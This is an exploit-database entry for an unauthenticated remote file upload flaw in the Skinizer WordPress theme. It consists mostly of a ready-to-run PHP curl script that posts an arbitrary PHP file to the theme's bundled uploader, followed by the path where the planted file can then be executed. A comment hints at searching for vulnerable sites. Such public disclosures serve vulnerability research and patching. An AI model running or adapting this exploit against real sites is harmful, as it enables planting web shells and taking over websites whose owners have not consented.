exploit-db-mirror/platforms/php/webapps/30214.txt
Offensive Security 6bd122cd4b Updated 12_12_2013
2013-12-12 21:02:26 +00:00

31 lines
1 KiB
Text
Executable file

###############################################################
# Exploit Title: Wordpress Skinizer theme Remote File Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/11/2013
# Vendor Homepage: http://themeforest.net
# Software Link: http://prefiles.com/9dgxv5102nkp/Skinizer.WordPress.v1.0.4.rar
# Google dork: Use your brain :)
# Tested on: Windows/Linux
###############################################################
1) Exploit :
= = = = = =
<?php
$uploadfile="file.php";
$ch = curl_init("
http://127.0.0.1/wp-content/themes/skinizer/framework/_scripts/valums_uploader/php.php
");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('FileDATA'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
# http://[Target]/wp-content/uploads/2013/12/file.php
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #